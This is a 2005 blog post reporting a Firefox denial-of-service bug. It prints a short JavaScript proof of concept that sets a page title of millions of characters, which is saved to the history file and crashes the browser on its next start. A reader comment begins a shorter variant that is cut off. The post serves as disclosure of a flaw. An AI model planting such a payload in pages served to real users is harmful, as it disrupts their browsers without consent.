The Latest Firefox Exploit: DOS via local buffer overflow

Posted in Browsers, Code, Computers & Technology, Law, Spread IE by Elliott Back on December 8th, 2005.

Apparently Firefox logs URL data in history.dat, meaning that it will save titles. If we make our title long enough, such as with the following bit of javascript, we can execute a denial of service (DOS) attack against Firefox the next time it loads:

<script type="text/javascript">
function ex() {
	var buffer = "";
	for (var i = 0; i < 5000; i++) {
		buffer += "A";
	}
	var buffer2 = buffer;
	for (i = 0; i < 500; i++) {
		buffer2 += buffer;
	}
	document.title = buffer2;
}
</script>

The anonymous author claims that code execution is also possible. Hopefully this will get fixed soon?

This entry was posted on Thursday, December 8th, 2005 at 12:19 am and is tagged with local buffer overflow, denial of service dos attack, code execution, denial of service dos, url data, denial of service, anonymous author, author claims, script type, document title, text javascript, lt, logs. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback.

Viewing 1 Comment

Shortener 3 years ago 1 point
Please login to rate.

Do you already have an account? Log in and claim this comment.

You don't really need that much code to generate a 2-Megabyte title.
<script type="text/javascript">
function ex() {
var buffer = "A";
for (var i = 0; i

reply edit reblog flag

Trackbacks

(Trackback URL)

blog comments powered by Disqus

The Search

search site archives

New Firefox Exploit

There's a new Firefox Exploit, *yawn*, that will totally *#$(# up your computer. In other news, claims of "better security" just so much FUD...

ZLib flaw promotes IE

I just saw this hilarious troll on slashdot regarding the newly discovered buffer overflow in zlib: Because Firefox renders PNG completely, it is prone to these